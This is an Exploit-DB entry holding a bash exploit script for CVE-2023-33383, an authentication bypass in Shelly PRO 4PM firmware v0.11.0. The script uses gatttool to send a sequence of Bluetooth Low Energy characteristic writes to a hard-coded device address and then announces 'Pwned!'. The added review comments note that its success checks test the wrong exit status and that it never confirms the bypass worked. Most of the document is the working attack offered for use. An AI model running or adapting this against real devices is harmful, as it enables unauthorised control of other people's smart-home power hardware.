Shelly PRO 4PM v0.11.0 - Authentication Bypass

EDB-ID:

51657


Platform:

Hardware

Date:

2023-08-04


#!/bin/bash

# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383

# Script-wide settings and output colours.
# IFS is set to the empty string, so word splitting on unquoted expansions is
# disabled for the rest of the script (only relevant to the unquoted
# $? tests below, which expand to a single token anyway).
IFS=
# NOTE(review): $false is not a shell builtin value; it is an unset variable,
# so "failed" becomes the empty string here. The script never reads "failed"
# again, and the later "$failed=$true" lines cannot assign to it (see below).
failed=$false
# ANSI escape sequences used by the echo -e calls below.
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
# NOTE(review): defined but not referenced anywhere in this file; presumably
# meant for matching gatttool's stderr, which is discarded (>/dev/null 2>&1).
substring="Connection refused"


#######################################
# Clear the terminal and print the coloured banner and key prompt.
# Globals:   GREEN, RED, ENDCOLOR (read)
# Arguments: none
# Outputs:   banner text on stdout via echo -e (escape interpretation is
#            bash-specific; under a plain sh this prints the literal \e codes)
# Returns:   exit status of the last echo
#######################################
banner()
    {
        clear
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo -e "${GREEN}[+]*********************************************************[+]"
        # Any key other than "x" and Enter falls through both branches of the
        # if/elif below and the script simply exits.
        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
    }

# Main flow: show banner, wait for one keypress, then drive gatttool against
# the single hard-coded BLE address c8:f0:9e:88:92:3e. Every gatttool call
# runs under sudo; the header comment says firmware v0.11.0 is required.
banner
# Silent single-character read. Pressing Enter yields an empty "key"
# (newline is the delimiter), which is what selects the payload branch.
read -s -n 1 key
if [ "$key" = "x" ]; then
    exit 0;
elif [ "$key" = "" ]; then
    # Connectivity check: primary-service discovery with a 5 s cap. Empty
    # output is treated as a timeout; gatttool's own exit status is not used.
    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
    if [ -z "$gattout" ]; then
        echo -e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    # Write 00000001 to handle 0x000d; all output is discarded, so the result
    # of this write is never checked.
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
    sleep 1
    # NOTE(review): $? here is the exit status of "sleep 1", not of gatttool,
    # so this branch only runs if sleep itself fails. Inside it,
    # "$failed=$true" expands to the bare command "=" (both variables are
    # empty) and assigns nothing; bash reports "command not found" and,
    # with no set -e, continues to the exit.
    if [ $? -eq 1 ]; then
       $failed=$true
       exit 0;
    fi
    # Write "ab" to handle 0x0008 (output discarded, status unchecked).
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
    sleep 1
    # NOTE(review): same issue as above — tests sleep's status, not
    # gatttool's, and "$failed=$true" is not an assignment. In practice the
    # else branch below is always taken once the first write has happened.
    if [ $? -eq 1 ]; then
        $failed=$true
        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
        exit 0;
    else
       # Write "abcd" to handle 0x0008 (output discarded, status unchecked).
       sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
       sleep 1
       # Five-second progress indicator; no device state is read back.
       for i in {1..5}
       do
          echo -ne "${GREEN}."
          sleep 1
       done
       # NOTE(review): printed unconditionally in this branch. Nothing in the
       # script verifies that the device actually accepted the writes or that
       # any authentication state changed; "Pwned!" is not evidence of success.
       echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
    fi
fi
fi